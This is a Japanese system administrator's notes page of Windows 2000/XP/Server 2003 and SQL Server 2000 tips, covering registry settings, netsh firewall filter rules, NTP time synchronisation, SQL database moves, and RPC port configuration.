Response.ContentType = "application/octet-stream;"
Const adTypeBinary = 1
Dim strFilePath
Dim objStream
strFilePath = Server.mapPath("path to the file")
Set objStream = Server.CreateObject("ADODB.Stream")
objStream.Open
objStream.Type = adTypeBinary
objStream.LoadFromFile strFilePath
Response.BinaryWrite objStream.Read
objStream.Close
Set objStream = Nothing
[HOWTO] ADODB.Stream オブジェクトを使用して ASP 経由でバイナリ ファイルをブラウザに送信する方法
PROXYを利用してIPアドレスを隠すには?
多段プロキシツール
プロキシランチャー
プロキシサーバリストを公開しているサイト
Proxy 4 Free
Proxy Bench
Find Proxy
Stay Invisible
ree Public Proxies
All Proxies
ProxyMatrix
PG Zone
16ビットアプリ実行時のエラーを回避(Windows XP)
KEY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\VirtualDeviceDrivers
値の名前 : VDD
データ型 : REG_MULTI_SZ
同じ位置にある ADD を削除し、VDDを追加する。
Windows Server 2003 または Windows 2000 Server で MS-DOS または 16 ビット Windows プログラムを実行すると "16 ビット MS-DOS サブシステム" エラー メッセージが表示される
ログオン時に「NumLock」をオンにする。
KEY HKEY_USERS\.DEFAULT\Control Panel\Keyboard
値の名前 : InitialKeyboardlndicators
データ型 : REG_SZ
値 : 2 (0:OFF/2:ON)
※NumLockをオンにした後にログアウトし、再度ログオンでも「NumLock」がオンになります。
SQL Server2000「サーバーを非表示にする」
サーバーネットワークユーティリティを起動して「TCP/IP」プロトコルの「プロパティ」を選択すると
「ネットワークプロトコル既定値の設定」でチェックボックス「サーバーを非表示」があります。
この設定は、次のレジストリに相当します
KEY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\MSSQLServer\SuperSocketNetLib\Tcp
値の名前 : TcpHideFlag
データ型 : REG_DWORD
値 : 0
このチェックボックスをオンにするかレジストリの値を 1 にして、SQL Server をリスタートすると、
SQL Server のポートは、通常の 1433/tcp ではなく 2433/tcp になります。
ポートの確認は、以下のコマンドを実行すると確認できます。
isql -S localhost,2433 -E -Q "PRINT 'OK'"
サーバーの非表示を有効から無効にしても、ポート番号は、2433 のままになりますので
1433 に明示的に修正する必要があります。
「サーバーの非表示」を有効にしても、1434/udp は、LISTEN になっていますので
1434/udp を LISTEN したくない場合は、TCP/IP プロトコルを含むプロトコルすべてを
無効にするか、IPSec やファイアウォールで防御する必要があります。
Serverサービスが利用するメモリー量やネットワーク速度を調整する。
Windows 2000/XP Professional
KEY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters
値の名前 : Size
データ型 : REG_DWORD
値 : 1
1:メモリーの使用を最小化する場合
2:バランスを取る場合
3:ネットワーク帯域の使用を最大化する場合
Server の場合は[ローカルエリア接続]の[Microsoftネットワーク用ファイルとプリンタ共有]で設定可能
ちなみに SQL Server をインストールすると、「ネットワーク帯域の使用を最大化する場合」に変わります。
http://msdn2.microsoft.com/ja-jp/library/ms191471.aspx
Windows 2000 Pro , Windows XP Home/Pro でファイアウォールを設定。
汎用ポートスキャンツール
Nmap
http://www.insecure.org/nmap/
タスクマネージャのプロセスと、netstat コマンドを利用する事で
外部に接続しているアプリケーションを調べる事は出来ます。
コマンドラインから、
netstat -a -n -o
(TASKLIST /SVC がいいかも。)
表示された PID と タスクマネージャの PID を比較する。
Windows XP では、標準で「インターネット接続ファイアウォール」が
実装されています。
マイクロソフトが提供するポートスキャンツールもあります。
PortqryV2.exe
http://www.microsoft.com/downloads/details.aspx?FamilyID=89811747-c74b-4638-a2d5-ac828bdc6983&DisplayLang=en
このあたりを参考に。http://www.atmarkit.co.jp/fwin2k/win2ktips/314listen/listen.html
ここも役にたつかな。http://isc.sans.org/
ネットワークモニタリングツールを製作する 第1回 SNMPの仕組みを理解する http://www.pc-view.net/Network/040213/index.html
2000/2003 Server 系では、「ルーティングとリモートアクセス」の機能の一部として
パケットフィルタリングを実装しています。
Windows 2000 Pro , Windows XP Home/Pro でも利用できますが
Server に入っているグラフィカルなインターフェイスは在りません。
これを有効にするには、管理ツールのサービスで
「Routing and Remote Access」を有効にします。
Workstation, Server サービスにも依存するので
これも動作させておく必要があります。
パケットフィルタリングは、 Netsh コマンドで設定する事になります。
PC を防御する場合は、この組み合わせが有効です。
Webブラウジングと電子メールの利用の場合は、
Netsh 実行後
routing ip set filter "ローカル エリア接続" input drop
routing ip set filter "ローカル エリア接続" output drop
routing ip add filter name="ローカル エリア接続" filtertype=input srcaddr=0.0.0.0 srcmask=0.0.0.0 dstaddr=0.0.0.0 dstmask=0.0.0.0
proto=icmp type=8 code=0
routing ip add filter name="ローカル エリア接続" filtertype=input srcaddr=0.0.0.0 srcmask=0.0.0.0 dstaddr=0.0.0.0 dstmask=0.0.0.0
proto=icmp type=0 code=0
routing ip add filter name="ローカル エリア接続" filtertype=input srcaddr=0.0.0.0 srcmask=0.0.0.0 dstaddr=0.0.0.0 dstmask=0.0.0.0
proto=udp type=53 dstport=0
routing ip add filter name="ローカル エリア接続" filtertype=input srcaddr=0.0.0.0 srcmask=0.0.0.0 dstaddr=0.0.0.0 dstmask=0.0.0.0
proto=udp type=67 dstport=68
routing ip add filter name="ローカル エリア接続" filtertype=input srcaddr=0.0.0.0 srcmask=0.0.0.0 dstaddr=0.0.0.0 dstmask=0.0.0.0
proto=tcp-est type=80 dstport=0
routing ip add filter name="ローカル エリア接続" filtertype=input srcaddr=0.0.0.0 srcmask=0.0.0.0 dstaddr=0.0.0.0 dstmask=0.0.0.0
proto=tcp-est type=25 dstport=0
routing ip add filter name="ローカル エリア接続" filtertype=input srcaddr=0.0.0.0 srcmask=0.0.0.0 dstaddr=0.0.0.0 dstmask=0.0.0.0
proto=tcp-est type=110 dstport=0
routing ip add filter name="ローカル エリア接続" filtertype=output srcaddr=0.0.0.0 srcmask=0.0.0.0 dstaddr=0.0.0.0 dstmask=0.0.0.0
proto=icmp type=8 code=0
routing ip add filter name="ローカル エリア接続" filtertype=output srcaddr=0.0.0.0 srcmask=0.0.0.0 dstaddr=0.0.0.0 dstmask=0.0.0.0
proto=icmp type=0 code=0
routing ip add filter name="ローカル エリア接続" filtertype=output srcaddr=0.0.0.0 srcmask=0.0.0.0 dstaddr=0.0.0.0 dstmask=0.0.0.0
proto=udp type=0 dstport=53
routing ip add filter name="ローカル エリア接続" filtertype=output srcaddr=0.0.0.0 srcmask=0.0.0.0 dstaddr=0.0.0.0 dstmask=0.0.0.0
proto=udp type=68 dstport=67
routing ip add filter name="ローカル エリア接続" filtertype=output srcaddr=0.0.0.0 srcmask=0.0.0.0 dstaddr=0.0.0.0 dstmask=0.0.0.0
proto=tcp type=0 dstport=80
routing ip add filter name="ローカル エリア接続" filtertype=output srcaddr=0.0.0.0 srcmask=0.0.0.0 dstaddr=0.0.0.0 dstmask=0.0.0.0
proto=tcp type=0 dstport=443
routing ip add filter name="ローカル エリア接続" filtertype=output srcaddr=0.0.0.0 srcmask=0.0.0.0 dstaddr=0.0.0.0 dstmask=0.0.0.0
proto=tcp type=0 dstport=25
routing ip add filter name="ローカル エリア接続" filtertype=output srcaddr=0.0.0.0 srcmask=0.0.0.0 dstaddr=0.0.0.0 dstmask=0.0.0.0
proto=tcp type=0 dstport=110
こんな感じの設定となります。
パケットフィルタリングを戻したい場合は、
netsh routing ip set filter "ローカル エリア接続" input forward
netsh routing ip set filter "ローカル エリア接続" output forward
と、コマンドラインを実行してから
「Routing and Remote Access」を無効化すれば OK です。
これでも心配な場合は、市販のファイアウォール製品を導入して下さい。
完璧なセキュリティ対策は存在しません。
Web、電子メール、ウイルス対策、ファイアウォール、全ての面で気を抜かないよう
注意して下さい。
ポート一覧
PORT NUMBERS
http://www.iana.org/assignments/port-numbers
インターネット プロトコル番号
http://support.microsoft.com/kb/289892
Windows 2000 で TCP/IP フィルタリングを構成する方法
http://support.microsoft.com/kb/309798
ルーティングとリモート アクセスのイベント ID の一覧
ルーティングとリモート アクセス サービスのイベント ID 一覧
イントラネット用にルーティングとリモート アクセスを設定する方法
SQL 文で昇順にした時の NULL や "" を最後に持ってくるには、、、
ORDER BY
CASE WHEN FIELD IS NULL THEN '1'
WHEN FIELD = '' THEN '1'
ELSE '0' + FIELD END
イベント ビューア ログ ファイルを別の場所に移動するには・・・
イベント ビューア ログ ファイルをハード ディスクの別の場所に移動するには、以下の手順を実行します。
1.[スタート] ボタンをクリックし、[ファイル名を指定して実行] をクリックします。
2・[名前] ボックスに regedit と入力し、[OK] をクリックします。
3.次のレジストリ キーを探して、クリックします。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog
4.移動するイベント ログを表すサブキーをクリックします。たとえば、[Application] をクリックします。
5.右側のウィンドウで、[File] をダブルクリックします。
6.[値のデータ] ボックスに新しい場所への完全なパス (ログ ファイル名を含めます) を入力し、[OK] をクリックします。
たとえば、アプリケーション ログ (Appevent.evt) を E ドライブの Eventlogs フォルダに移動する場合は、
e:\eventlogs\appevent.evt と入力します。
7.移動するログ ファイルごとに手順 4. 〜 6. を実行します。
8.[レジストリ] メニューの [レジストリ エディタの終了] をクリックします。
9.コンピュータを再起動します。
ちなみに、Windows Server 2008 ではログのプロパティから変更できます。
また、「イベントを上書きしないでログをアーカイブする」という項目が追加されています。
SQL Server 2000 のトリガテンプレートを初期化するには
HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\SQLEW
にある[TriggerTemplate]のキーを削除する。
--
[INF] SQL Server のメモリ使用量
http://support.microsoft.com/?id=321363
--
昇順並び替えで空白行を最後に持っていくには
ORDER BY
CASE WHEN FIELD IS NULL THEN '1'
WHEN FIELD = '' THEN '1'
ELSE '0' + FIELD
END
--
検索条件によっては、違う文字を誤認識する。
NLS (National Language Support) 機能に問題が在る。
.NET の String.Compare では "aー" = "aa"
SQL の場合は独自実装なので、少し異なり "々" = "ー" となる。COLLATE のバグ
PASSJ セキュリティ分科会ボードリーダの河端さんがまとめています。
http://blogs.sqlpassj.org/yoshihirokawabata/archive/2004/06/07/2625.aspx
Mac をネットワークに参加させるには
AppleTalk over TCP/IP (AFT2.2) から AppleTalk は TCP/IP の上で実現しています。
TCP ポートは 548 番。ルータ Firewall の TCP ポート 548 をあければネット上で共有可能。
シャットダウンの待ち時間を短くする
レジストリ エディタ (Regedit.exe) を起動します。
次のレジストリ キーを見つけてクリックします。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
値の名前 : WaitToKillServiceTimeout
データ型 : REG_SZ
値 : 20000
応答のないサービスの待ち時間を短縮したい場合は、この値を変更する。
値は待ち時間でミリ秒。
時刻あわせ
NTP サーバ一覧として
Public NTP Time Servers
http://www.eecis.udel.edu/~mills/ntp/servers.html
国内公開 ntp サイト一覧
サイトリスト(ntpsites)
ntp1.jst.mfeed.ad.jp # 日本のインターネット環境に正確な時刻を提供することを目的とした実験で設置された
ntp2.jst.mfeed.ad.jp # 公共 NTP。日本標準時を決める原子時計から時刻を得た stratum 1 サーバと同期した
ntp3.jst.mfeed.ad.jp # stratum 2 サーバ群。www.jst.mfeed.ad.jp 参照。
sutns.sut.ac.jp # 東京理科大学 stratum 2。外部公開をやめた ntp.sut.ac.jp に同期。
ntp.wakayama-u.ac.jp # 和歌山大学 stratum 2。ntp2.tohoku.ac.jp に同期している。
ns.hiroshima-u.ac.jp # 広島大学 stratum 3。広島大のサーバは正体の良く分からない上流サーバに
ntp.hiroshima-u.ac.jp # 同期していることがよくあります。
# よくあります、というのは、上流サーバがしばしば変わり、
# それも時間帯によって使い分けている印象があるためです。
# しかし、このようなサーバでも十分に信用できてしまうのが ntp の良いところなのです。
stratum 1 サーバ
これらは stratum 2 である mfeed.ad.jp と同時に利用しない方が良い
gpsntp.miz.nao.ac.jp # 国立天文台 GPS の stratum 1
clock.nc.fukuoka-u.ac.jp # 福岡大学鶴岡研 stratum 1。http://www.tl.fukuoka-u.ac.jp/Lab/tsuruoka/
drake.nc.fukuoka-u.ac.jp # 同上
eagle.center.osakafu-u.ac.jp # 大阪府立大学 stratum 1
ntp1.tohoku.ac.jp # 東北大学 stratum 1
ntp2.tohoku.ac.jp # 同上
ntp.tut.ac.jp # 豊橋技術科学大学 stratum 1。 事実上公開。
# http://www.cc.tut.ac.jp/netservice/NTP/index.html を参照。
# http://www.cc.tut.ac.jp/netservice/NTP/ntpstats.html でクライアント情報をモニター。
ntp.nc.u-tokyo.ac.jp # 東京大学 stratum 1
geo.gen.u-ryukyu.ac.jp # 琉球大学 stratum 1
タイムサーバと同期間隔を指定する
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\Parameters
値の名前 : NtpServer
データ型 : REG_SZ
値 : タイムサーバ名またはIPアドレス, 同期モード
指定可能な同期モード
0x1: SpecialPollInterval レジストリ値を使用して同期間隔を決定
0x2: 同期失敗時の予備タイムサーバ(フォールバックタイムソース)として使用
0x4: 対称アクティブモードで同期要求を送信
0x8: クライアントモードで同期要求を送信
値の名前 : Type
データ型 : REG_SZ
値 : NTP、NT5DS、NoSync
NTP: ユーザ指定のタイムサーバ(SNTPサーバーを含む)
NT5DS: ドメインの階層に従う
NoSync: 同期を行わない
時刻合わせの間隔を短くする
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient
値の名前 : SpecialPollInterval
データ型 : REG_DWORD
値 : 600(10分間隔)
値は秒でデフォルトは1週間(604800)ドメイン環境では 1時間(3600)
0x1 がないタイムサーバと同期する場合
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\Config
値の名前 : MaxPollInterval
データ型 : REG_DWORD
値 : 15(ドメイン環境では10)
最長同期間隔。2 の n 乗 でデフォルトは 32768秒
値の名前 : MinPollInterval
データ型 : REG_DWORD
値 : 10(ドメイン環境では6)
最短同期間隔。2 の n 乗 でデフォルトは 1024秒
Active Directory と時刻同期
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters
値の名前 : SkewTime
データ型 : REG_DWORD
値 : 5 (分)
時刻の修正許容範囲
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\Config
進める範囲を調整
値の名前 : MaxPosPhaseCorrection
データ型 : REG_DWORD
値 : 54000(秒)ドメイン環境では 0xFFFFFFFF(無制限)
戻す範囲を調整
値の名前 : MinPosPhaseCorrection
データ型 : REG_DWORD
値 : 54000(秒)ドメイン環境では 0xFFFFFFFF(無制限)
W32Timeサービスのレジストリエントリ
http://support.microsoft.com/default.aspx?scid=kb;ja;223184
※ W32Time (Windows Time Synchronization サービス) は、IETF RFC 1769 で詳述
されているように、SNTP (Simple Network Time Protocol) に完全準拠した実装
http://support.microsoft.com/default.aspx?scid=kb;JA;224799
NTPでネットワーク全体の時刻を合わせる
http://www.atmarkit.co.jp/fwin2k/win2ktips/050nettime/nettime.html
※ このサイトも NTP と SNTP がごっちゃになっている為、内容に重大な誤りがある。
SNTP サーバを使った時刻同期は、時刻が戻る可能性があるので、絶対やっては
いけません。時刻が戻ってしまうと、上記の話と同じで、トランザクションロ
グの整合性が保てません。
時刻同期させる場合は、NTP の slew モードで行う。
Windows2000 上で動作する NTP、SNTP クライアントとしては
「桜時計」(http://www.venus.dti.ne.jp/~uno/)
「xntp 3.x/ntp 4.x」(http://www.eecis.udel.edu/~ntp/ )
「AdjustPC」(http://www.geocities.co.jp/SiliconValley-PaloAlto/5362/ )
が有名。
アクセス制御が有効なプロキシで Windows 2000 および Windows Server 2003 のタイム サービスが動作しない
Windows XP で権限のあるタイム サーバーを構成する方法
Windows Server 2003 で権限のあるタイム サーバーを構成する方法
ネットワーク上の外部タイムサーバを参照して権限のあるタイムサーバに設定する場合
・Type レジストリ を NTP にする
・AnnounceFlags レジストリを 5 にする
・Enabled レジストリを 1 にする
・NtpServer レジストリを IPアドレス, 0x1 にする
・SpecialPollInterval レジストリを適切な値にする
・MaxPosPhaseCorrection, MinPosPhaseCorrection レジストリを適切な値にする
・設定を反映させる為、W32Time サービスの再起動
ドメインコントローラ(フォレスト・ルート・ドメイン)を構成した場合に
同期が取れず Time-Service で イベントID 12 や 144 が警告として上がる
ので上記設定に変更するかタイムサーバを変更しておく必要がある。
※動作の確認はしてませんのでコマンドから変更する場合は確認すること。
例)
Type を NTP に
確認
REG QUERY "HKLM\\SYSTEM\CurrentControlSet\Services\W32Time\Parameters" /v Type
変更
REG ADD "HKLM\\SYSTEM\CurrentControlSet\Services\W32Time\Parameters" /v Type /t REG_SZ /d NTP /f
AnnounceFlags を 5 に
確認
REG QUERY "HKLM\\SYSTEM\CurrentControlSet\Services\W32Time\Config" /v AnnounceFlags
変更
REG ADD "HKLM\\SYSTEM\CurrentControlSet\Services\W32Time\Config" /v AnnounceFlags /t REG_DWORD /d 5 /f
NtpServer に登録
確認
REG QUERY "HKLM\\SYSTEM\CurrentControlSet\Services\W32Time\Parameters" /v NtpServer
変更
REG ADD "HKLM\\SYSTEM\CurrentControlSet\Services\W32Time\Parameters" /v NtpServer /t REG_SZ /d ntp.nict.jp,0x1 ntp.jst.mfeed.ad.jp,0x1 /f
・インターネットマルチフィード http://www.jst.mfeed.ad.jp/service/02.html
・独立行政法人情報通信研究機構(NICT) http://jjy.nict.go.jp/ntp/
を利用する場合
DNS 名の解決を発生させないようにIPアドレスで指定
NTP サーバをラウンドロビンで参照するようになっている場合はホスト名を指定
最後にサービスの再起動
net stop w32time & net start w32time
クライアントモードでしか要求を受け付けない外部のタイムサーバと同期する場合は
同期要求を対称アクティブモードからクライアントモードに変更する
W32TM /config /manualpeerlist:NTPサーバ, 0x8 /syncfromflags:MANUAL
net stop w32time
net start w32time
W32TM /resync
0x8 がクライアントモードで同期要求するパラメータ
ブラジルの夏時間を構成する方法
標準時間形式に Active Directory 内の日時属性を変換する方法
Windows タイム サービスのデバッグ ログを有効にする方法
W32Time により頻繁にイベント ID 50 がイベント ログに記録され Windows Server 2003 および Windows XP で時刻の同期に失敗する
Windows XP または Windows Server 2003 を実行しているコンピュータからネットワークに接続するとき、接続の問題が断続的に発生する
Windows Server 2003 で Windows 以外の NTP サーバーとの同期が成功しない
時刻が大きく変更されないように Windows タイム サービスを構成する
プロバイダ・機関別(wiki@nothing)
インターネットマルチフィード「時刻情報提供サービス for Public」の提供開始について
日本標準時プロジェクトサイト
世界最高性能のインターネット用時刻同期サーバによる日本標準時配信の開始
NICT 公開 NTP サービス (インターネット経由)
Windowsネットワーク時刻同期の基礎とノウハウ
第1回 Windows OSにおける時刻同期サービスとNTP
http://www.atmarkit.co.jp/fwin2k/operation/winntp01/winntp01_01.html
第2回 w32timeデバッグ・ログとw32tmコマンド
http://www.atmarkit.co.jp/fwin2k/operation/winntp02/winntp02_01.html
time.windows.com が不調らしい。
http://isc.sans.org/diary.php?date=2005-05-20
http://isc.sans.org/diary.php?date=2005-05-21
電波時計で時刻同期
C-dex社 の JST2000 が 19800円で買えます。
http://www.c-dex.co.jp/
2007年から米国のサマータイム(夏時間、DST:Daylight Saving Time)期間が
3月の第2日曜から11月の第1日曜までに延長されます。
変更前 4月 第1日曜日〜10月 最終日曜日
「4月の第1日曜日の午前 2時に時計を 1時間進め、
10月の最終日曜日の午前 2時に時計を 1時間戻す」
変更後 3月 第2日曜日〜11月 第1日曜日
「3月の第1日曜日の午前 2時に時計を 1時間進め、
11月の第1日曜日の午前 2時に時計を 1時間戻す」
2007 年の夏時間変更のための準備:Microsoft
http://support.microsoft.com/gp/cp_dst
Windows VISTA、2008 Server では、再起動を繰り返すとシステム時刻がずれるようで
HPET(High Precision Event Timer)の問題っぽい。
The system time lags when you restart a Windows Vista-based computer that supports High Precision Event Timer
http://support.microsoft.com/kb/933272
W32Time を無効にしておくのが吉。
BIOS 上で hpet を disable にすると直るかも(未確認)
2009.1.1 はうるう秒注入で1秒長くなるそうで。。。
「うるう秒」挿入のお知らせ〜 来年の元日はいつもより「1秒」長い1日です 〜
http://www2.nict.go.jp/pub/whatsnew/press/h20/080912/080912-1.html
うるう秒に関する Windows タイム サービスの処理
http://support.microsoft.com/kb/909614/ja
時刻同期プロトコル「NTP」にDoS攻撃を受ける脆弱性
http://japan.zdnet.com/news/sec/story/0,2000056194,20405087,00.htm
AdjustPC には、受信データのサーバーIPをチェックする項目があります。
SQL Server のデータベースを移動させる。
SQL Server では、データベースを作成するとデータフォルダに
*.MDF
*.LDF
の2つが作成されます。
このファイルをコピーします(SQL サーバが稼動中はコピーできません)
新しく立てた SQL Server にこのファイルをコピーします。
クエリアナライザを使ってインポートします。
(sp_detach_db/sp_attach_db コマンドを利用)
書き方は以下の通り。
/* データベースを切り離す場合 */
sp_detach_db 'db'
go
/* データベースをアタッチする */
sp_attach_db 'ncs',
@filename1 = 'F:\Microsoft SQL Server\MSSQL\Data\DB_Data.MDF',
@filename2 = 'F:\Microsoft SQL Server\MSSQL\Data\DB_Log.LDF'
go
SQL Server データベースをデタッチとアタッチにより新しい場所に移動する
[HOWTO] SQL Server を実行しているコンピュータ間でデータベースを移動する方法
LDF ファイルが破損してアタッチ出来ない場合の修復方法
1.同じデータベースを作成
2.SQL Server を停止
3.MDF ファイルを上書き
4.SQL Server を機動
5.DBCC CHECKDB を使ってログの再構築
dbcc checkdb('database_name', noindex repair_allow_data_loss)
dbcc rebuild_log でも OK?
参考
http://msdn.microsoft.com/library/ja/tsqlref/ts_dbcc_00gy.asp
http://msdn2.microsoft.com/ja-jp/library/ms176064.aspx
トランザクションログを縮小したい。
DBCC SHRINKFILEコマンドを使用するとファイルサイズを小さくすることができます。
使い方は以下のページを参考に。
データベース オプションの設定
SQL Server 関連そのた。
◆SQL に関する Q&A
http://www.microsoft.com/technet/technetmag/issues/2007/03/SQLQA/default.aspx?loc=jp/
◆エラー メッセージ "SQL Server が存在しないか、アクセスが拒否されました" の原因
http://support.microsoft.com/default.aspx?scid=kb;ja;328306
SQL Server 2005 Tips and Tips 第 1 回 ネットワーク接続を有効化しよう
http://www.microsoft.com/japan/sql/ssj/tips/01.mspx
cliconfig を実行すると、つながるんだとか。。。
◆SQL Server 2000 ローカル データベースのネットワーク接続をセキュリティで保護する方法
http://support.microsoft.com/default.aspx?scid=kb;ja;814130
◆SQLの管理
http://www.microsoft.com/japan/msdn/library/default.asp?url=/japan/msdn/library/ja/adminsql/ad_mon_perf_6zg3.asp
◆「SQL Server 監視ツールの基本操作」
http://www.sqlpassj.org/tokushu/dba/default.aspx(PASSJ)
◆ビキナー
http://www.sqlpassj.org/bunkakai/begin/default.aspx(PASSJ)
◆プロファイラを使ってみよう
http://www.sqlpassj.org/tokushu/dba/01.aspx(PASSJ)
SQL Server 2000でいってみよう
は持ってたりします。分かりやすい本です。
SQL の LIKE に [] が利用出来る事を最近知った。orz
ちなみに、VB でも出来る
http://www.microsoft.com/japan/msdn/library/default.asp?url=/japan/msdn/library/ja/vblr7/html/vaoprlike.asp
Windows Server 2003 の シャットダウン イベントの追跡ツール に独自項目を追加するには?
レジストリ エディタ (Regedit.exe) を起動します。
次のレジストリ キーを見つけてクリックします。
※ 1041(言語コード) と言うキーは存在しないので、新しく作成する必要がある。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVsersion\Reliability\UserDefined\1041
値の名前 : コントロールフラグ;メジャー理由番号;マイナー理由番号
データ型 : REG_MULTI_SZ
値 : タイトルと説明を2行に分けて記述
コントロールフラグ
P: シャットダウンまたは再起動が「計画済み」の場合指定
C: コメント入力必須。 S と併用必須
B: ID の入力を必須とする。 D と併用必須
S: ユーザがシャットダウンを開いた時の理由を表示する場合に指定。 D との併用可能
D: ユーザが予期せずにシャットダウンが開いた時の理由を表示する場合。 S との併用可能
メジャー理由番号
64〜255
マイナー理由番号
0〜65535
※リスト表示の並べ替えに利用される。
タイトル
理由のタイトルを 64 字以内で記述
説明
理由の説明 を 696 字以内で記述
例)
値の名前 : PS;64;0
値 : 単なるシャットダウン(計画済み)
単にシャットダウンします。
Windows Server 2003 の シャットダウン イベントの追跡ツール から定義済みメニューを削除するには。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVsersion\Reliability
値の名前 : ShutdownIgnorePredefinedReasons
データ型 : REG_DWORD
値 : 0 ※ 1 にする事でデフォルトの定義済み理由を非表示にする事が可能。
※ キーは存在しないので、新しく作成する必要がある。
その他
Windows Server 2003 でシャットダウン処理が停止する場合がある
http://support.microsoft.com/kb/913659/ja
Windows Server 2003 ベースのコンピュータが次のエラー メッセージを次に生成し、そして、:"停止する: 0x0000008E "クラッシュする
http://support.microsoft.com/default.aspx?scid=kb;ja;907966
RPC の動的ポート割り当てを構成する方法
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Internet\
値の名前 : Ports
データ型 : REG_MULTI_SZ
値 : 0 〜 65535
IP ポートの範囲を指定します。
単一のポート ("5984" など) またはポートの範囲 ("5000-5050" など) を文字列で指定
値の名前 : PortsInternetAvailable
データ型 : REG_SZ
値 : Y または N (大文字小文字は区別されません)
Y の場合、Ports キーに指定したポートは、そのコンピュータ上でインターネットから使用できるすべてのポートを示す。
N の場合、Ports キーに指定したポートは、インターネットから使用できないすべてのポートを示す。
値の名前 : UseInternetPorts
データ型 : REG_SZ
値 : Y または N (大文字小文字は区別されません)
システムのデフォルトのポリシー
Y の場合、デフォルト値を使用するプロセスには、事前の定義に従って、インターネットから使用できるポートのセットからポートが割り当てられる。
N の場合、デフォルト値を使用するプロセスには、イントラネット専用ポートのセットからポートが割り当てられる。
以下のキーに Internet キーを追加します。
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc
Internet キーの下に、Ports 値 (REG_MULTI_SZ)、PortsInternetAvailable 値 (REG_SZ)、および UseInternetPorts 値 (REG_SZ) を追加します。
次に示すのは、5000 〜 5020 の範囲のポートを使用する場合の新しいレジストリ キーの例です。
Ports (REG_MULTI_SZ) : 5000-5020
PortsInternetAvailable (REG_SZ) : Y
UseInternetPorts (REG_SZ) : Y
※ポートの範囲は、5000 以上で 20 以上の幅を持つように指定する必要があるようです。
参照
[HOWTO] ファイアウォールで動作するように RPC の動的ポート割り当てを構成する方法
HKEY_Local_Machine\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
使用できるポートの数を増やす
値の名前 : MaxUserPorts
データ型 : REG_DWORD
値 : 20
※ キーは存在しないので、新しく作成する必要がある。
TIME_WAIT 状態で待機する時間の長さを指定
値の名前 : TcpTimedWaitDelay
データ型 : REG_DWORD
値 : デフォルト 240 秒
※ キーは存在しないので、新しく作成する必要がある。
再送が何度行われたら接続を中断するかを指定
値の名前 : TcpMaxDataRetransmissions
データ型 : REG_DWORD
値 : デフォルト 5 ※ 3 より小さい値は設定しない。
※ キーは存在しないので、新しく作成する必要がある。
参照
Windows Server 2003 で RPC エンドポイント マッパーのエラーのトラブルシューティングを行う方法
SQL Server の接続プールが無効の場合に調整が必要な TCP/IP 設定
TIME_WAIT 状態を短くするのはチューニングの基本って事で...
地域レジストリ
アジア太平洋地域 APNIC(Asia Pacific Network Information Centre)
日本に割り振られているIP一覧
アメリカ地域 ARIN(American Registry for Internet Numbers)
割り当てリスト
ヨーロッパ地域 RIPE NCC(Reseaux IP Europeens Coordination Centre)
カリブ・ラテンアメリカ地域 LACNIC(The Latin American and Caribbean IP address Regional Registry)
アフリカ AfriNIC(African Network Information Centre)
ネットワーク負荷分散クラスタについて。
調べてないので、この辺りで…
ネットワーク負荷分散クラスタ
ネットワーク負荷分散 : Windows 2000 および Windows Server 2003 での構成の推奨事例
Windows Server 2003 クラスタの印刷問題のトラブルシューティング方法
Windows Server 2003 でネットワーク負荷分散の TCP/IP を設定する方法
Windows Server 2003 の Windows クラスタ機能のインストールまたはアップグレード後、クラスタ サーバーでドライブへの接続タイムアウトが発生することがある
Windows Server 2003 ベースのクラスタ サーバーに対して、より制限の厳しいセキュリティ設定を適用する方法
Windows 2000 および Windows Server 2003 クラスタ ノードをドメイン コントローラとして構成する
Windows Server 2003 クラスタで Microsoft 分散トランザクション コーディネータを構成する方法
後編「Web もクラスタ! Windows Network Load Balancing Services」
http://www.microsoft.com/japan/windowsserversystem/virtualserver/community/vol2/page1.mspx
Windows Server 2008「フェイルオーバークラスタリング」の効果的な利用法
http://techtarget.itmedia.co.jp/tt/news/0810/22/news01.html
クラスタの実験するには仮想化環境が便利ですね。
仮想化については下の方に書いています。
Windows 2008 でネットワーク負荷分散マネージャに自分しか表示されない場合
アカウントがログオンに失敗しました。
ログオンを失敗したアカウント:
セキュリティ ID: NULL SID
アカウント名: test_nlb
が表示される場合は、コントロールパネル>ユーザアカウント から
ユーザーアカウント制御の有効化または無効化を選択して
「ユーザーアカウント制御(UAC)を使ってコンピュータの保護に役立たせる」
のチェックを外したのち、再起動。
どうも、UAC が悪さしてるっぽ。
Windows XP で TCP/IP をリセットする方法
Windows XP では、NetShell ユーティリティの IP コンテキストで reset コマンドが利用できます。
このコマンドを実行すると、インターネット プロトコル (TCP/IP) によって使用される必要なレジストリ キーを書き換えて、
プロトコルを削除して再インストールしたときと同じ結果を得ることができます。
コマンドのサンプル
netsh int ip reset resetlog.txt
netsh int ip reset c:\resetlog.txt
Windows XP で TCP/IP をリセットする方法
Windows Server 2003 で "インターネット プロトコル (TCP/IP)" をリセットする方法
証明機関をインストールおよび構成する
発行依頼
CertReq c:\certreq.txt
※発行時に必要な番号が表示されるので控えておく。
発行
CertReq -retrieve 1
出来上がったファイルを組み込んで完了。
http://www.zdnet.co.jp/help/howto/win/win2000/0007complus_vb/chap08/36.html に詳しく書かれていましたが、、、
インターネットアーカイブに残ってました。
http://web.archive.org/web/20031205151533/http://www.zdnet.co.jp/help/howto/win/win2000/0007complus_vb/chap08/36.html
設定ファイルを自前で用意して発行する場合は以下が参考になります。
